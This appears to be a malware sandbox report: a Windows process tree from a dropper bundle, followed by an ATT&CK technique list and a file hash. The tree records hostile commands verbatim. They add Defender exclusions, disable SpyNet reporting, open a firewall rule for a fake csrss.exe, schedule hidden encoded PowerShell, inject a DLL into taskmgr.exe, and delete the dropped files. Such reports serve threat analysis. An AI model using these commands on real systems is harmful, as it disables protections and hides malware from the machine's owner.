"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,11790699113925313211,7907185333462347596,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:2
3⤵
PID:2564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,11790699113925313211,7907185333462347596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:1
3⤵
PID:3024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,11790699113925313211,7907185333462347596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:1
3⤵
PID:3908

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2220,11790699113925313211,7907185333462347596,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4896 /prefetch:8
3⤵
PID:3964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,11790699113925313211,7907185333462347596,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1252 /prefetch:1
3⤵
PID:4976

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,11790699113925313211,7907185333462347596,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 /prefetch:8
3⤵
PID:4368

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,11790699113925313211,7907185333462347596,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 /prefetch:8
3⤵
PID:3492

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
- Drops file in Program Files directory
PID:2972

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xe0,0xdc,0xe8,0xd8,0xe4,0x7ff7e6355460,0x7ff7e6355470,0x7ff7e6355480
4⤵
PID:4160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,11790699113925313211,7907185333462347596,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
3⤵
PID:4764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,11790699113925313211,7907185333462347596,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6104 /prefetch:2
3⤵
PID:4196

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3416

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:1752

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3556

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3560

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:748

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4348

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:4380

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:2464

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /94-94
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4496

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:4304

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:336

C:\Users\Admin\AppData\Local\Temp\Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Installation.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:1188

C:\Users\Admin\Pictures\Adobe Films\TgzysDkCy5GzQg9Jd0abQkvR.exe
"C:\Users\Admin\Pictures\Adobe Films\TgzysDkCy5GzQg9Jd0abQkvR.exe"
3⤵
- Executes dropped EXE
PID:5224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 2172
3⤵
- Program crash
PID:6060

C:\Users\Admin\AppData\Local\Temp\mysetold.exe
"C:\Users\Admin\AppData\Local\Temp\mysetold.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1668

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3688

C:\Users\Admin\AppData\Local\Temp\Complete.exe
"C:\Users\Admin\AppData\Local\Temp\Complete.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:3284

C:\Users\Admin\Documents\PtbxSfCYb6Ada5yumE1Czrh1.exe
"C:\Users\Admin\Documents\PtbxSfCYb6Ada5yumE1Czrh1.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 624
4⤵
- Program crash
PID:4776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 632
4⤵
- Program crash
PID:5776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 668
4⤵
- Program crash
PID:5024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 812
4⤵
- Executes dropped EXE
- Program crash
- Suspicious use of SetWindowsHookEx
PID:3728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 1228
4⤵
- Program crash
PID:5512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 1304
4⤵
- Program crash
PID:5700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 1312
4⤵
- Program crash
PID:2512

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "PtbxSfCYb6Ada5yumE1Czrh1.exe" /f & erase "C:\Users\Admin\Documents\PtbxSfCYb6Ada5yumE1Czrh1.exe" & exit
4⤵
PID:3524

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "PtbxSfCYb6Ada5yumE1Czrh1.exe" /f
5⤵
- Kills process with taskkill
PID:1844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 1096
4⤵
- Program crash
PID:3708

C:\Users\Admin\Documents\mSHdbLm88ZC3sOz0MsHb_390.exe
"C:\Users\Admin\Documents\mSHdbLm88ZC3sOz0MsHb_390.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:3540

C:\Users\Admin\AppData\Local\Temp\011a79fd-fbf8-4f1c-a47e-6b7a3f90d523.exe
"C:\Users\Admin\AppData\Local\Temp\011a79fd-fbf8-4f1c-a47e-6b7a3f90d523.exe"
4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:5832

C:\Users\Admin\Documents\2MGmqKtaWVQvR_aWmj3MdgZe.exe
"C:\Users\Admin\Documents\2MGmqKtaWVQvR_aWmj3MdgZe.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4340

C:\Users\Admin\Documents\iHngxU3cVgjssPChkVvEa8FV.exe
"C:\Users\Admin\Documents\iHngxU3cVgjssPChkVvEa8FV.exe"
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:868

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
4⤵
PID:6132

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
5⤵
- Kills process with taskkill
PID:4936

C:\Users\Admin\Documents\JYqtKZ9VMR9QWrhO3BJTfa5q.exe
"C:\Users\Admin\Documents\JYqtKZ9VMR9QWrhO3BJTfa5q.exe"
3⤵
- Executes dropped EXE
PID:1556

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:5480

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:5844

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:3000

C:\Users\Admin\Documents\f6NbhqzbGjqSK_FWGRvOtGn6.exe
"C:\Users\Admin\Documents\f6NbhqzbGjqSK_FWGRvOtGn6.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 468
4⤵
- Program crash
PID:5652

C:\Users\Admin\Documents\A1nArKMyj2aidGYsnk74lwW1.exe
"C:\Users\Admin\Documents\A1nArKMyj2aidGYsnk74lwW1.exe"
3⤵
PID:3728

C:\Users\Admin\Documents\yan6zjgcFq6Syhr4zEseTjOJ.exe
"C:\Users\Admin\Documents\yan6zjgcFq6Syhr4zEseTjOJ.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3776

C:\Users\Admin\Documents\lzticJq7_775LC6cTkVFZRk4.exe
"C:\Users\Admin\Documents\lzticJq7_775LC6cTkVFZRk4.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 480
4⤵
- Program crash
PID:5704

C:\Users\Admin\Documents\zXdDEVf7mamOqjSI5Tpcby_y.exe
"C:\Users\Admin\Documents\zXdDEVf7mamOqjSI5Tpcby_y.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4900

C:\Users\Admin\Documents\pJglbkrSsOdYPwGyoMpuG8tW.exe
"C:\Users\Admin\Documents\pJglbkrSsOdYPwGyoMpuG8tW.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5060

C:\Users\Admin\Documents\9c5MAwlbt0rDJKWOzi7BfqsH.exe
"C:\Users\Admin\Documents\9c5MAwlbt0rDJKWOzi7BfqsH.exe"
3⤵
- Executes dropped EXE
PID:2388

C:\Users\Admin\Documents\i5Qt8Tg4QjEJubcKoI5wjaIA.exe
"C:\Users\Admin\Documents\i5Qt8Tg4QjEJubcKoI5wjaIA.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4296

C:\Users\Admin\Documents\i5Qt8Tg4QjEJubcKoI5wjaIA.exe
C:\Users\Admin\Documents\i5Qt8Tg4QjEJubcKoI5wjaIA.exe
4⤵
- Executes dropped EXE
PID:5932

C:\Users\Admin\Documents\fnH4cP5IPLpAsOqwykBYFrXU.exe
"C:\Users\Admin\Documents\fnH4cP5IPLpAsOqwykBYFrXU.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5028

C:\Users\Admin\Documents\_mYP_tSnTOgnjgNLP3W4DIHR.exe
"C:\Users\Admin\Documents\_mYP_tSnTOgnjgNLP3W4DIHR.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:5036

C:\Users\Admin\Documents\BprzbeVD2JV25BkESLpHQ0FM.exe
"C:\Users\Admin\Documents\BprzbeVD2JV25BkESLpHQ0FM.exe"
3⤵
- Executes dropped EXE
PID:4100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\BprzbeVD2JV25BkESLpHQ0FM.exe
4⤵
PID:5504

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
5⤵
PID:2984

C:\Users\Admin\Documents\O3bWtVFAnzUgWoGX7TAzOKBX.exe
"C:\Users\Admin\Documents\O3bWtVFAnzUgWoGX7TAzOKBX.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:3700

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im O3bWtVFAnzUgWoGX7TAzOKBX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\O3bWtVFAnzUgWoGX7TAzOKBX.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:5320

C:\Windows\SysWOW64\taskkill.exe
taskkill /im O3bWtVFAnzUgWoGX7TAzOKBX.exe /f
5⤵
- Kills process with taskkill
PID:3784

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:4936

C:\Users\Admin\Documents\HXa9ThBMsSu04vgU7n8y0hWn.exe
"C:\Users\Admin\Documents\HXa9ThBMsSu04vgU7n8y0hWn.exe"
3⤵
PID:2944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 480
4⤵
- Program crash
PID:5728

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:2440

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:2092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 608
3⤵
- Program crash
PID:2900

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2092 -ip 2092
1⤵
PID:644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5028 -ip 5028
1⤵
PID:4376

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
1⤵
PID:4812

C:\Windows\SysWOW64\cmd.exe
cmd
2⤵
PID:5576

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
3⤵
- Enumerates processes with tasklist
PID:4948

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
3⤵
PID:4700

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
3⤵
- Enumerates processes with tasklist
PID:5148

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
3⤵
PID:5856

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
3⤵
PID:2940

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4952

C:\Windows\SysWOW64\waitfor.exe
waitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT
3⤵
PID:4200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 460
1⤵
- Program crash
PID:4728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 472
1⤵
- Program crash
PID:4660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5028 -ip 5028
1⤵
PID:3456

C:\Users\Admin\AppData\Local\Temp\7zS79EB.tmp\Install.exe
.\Install.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3408

C:\Users\Admin\AppData\Local\Temp\7zS89CA.tmp\Install.exe
.\Install.exe /S /site_id "525403"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:5588

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
3⤵
PID:5744

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
4⤵
PID:1236

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
5⤵
PID:5076

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
5⤵
PID:5948

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
3⤵
PID:6020

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2944

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
4⤵
PID:4400

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
5⤵
PID:5056

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
5⤵
PID:3148

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gHTAMILan" /SC once /ST 02:46:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:4992

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gHTAMILan"
3⤵
PID:5240

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gHTAMILan"
3⤵
PID:5936

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 04:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\enrfxPy.exe\" j6 /site_id 525403 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5780

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:1236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2140 -ip 2140
1⤵
PID:4884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 460
1⤵
- Program crash
PID:4816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1820 -ip 1820
1⤵
PID:4792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2944 -ip 2944
1⤵
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4144 -ip 4144
1⤵
PID:520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2140 -ip 2140
1⤵
PID:5484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1820 -ip 1820
1⤵
PID:5508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2944 -ip 2944
1⤵
PID:5472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4144 -ip 4144
1⤵
PID:5660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 1188 -ip 1188
1⤵
PID:6012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4144 -ip 4144
1⤵
PID:6100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4144 -ip 4144
1⤵
PID:1752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4144 -ip 4144
1⤵
PID:5368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4144 -ip 4144
1⤵
PID:5600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4144 -ip 4144
1⤵
PID:6108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4144 -ip 4144
1⤵
PID:3892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5092

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:4144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 6024 -ip 6024
1⤵
PID:3872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
1⤵
PID:6132

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:384

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
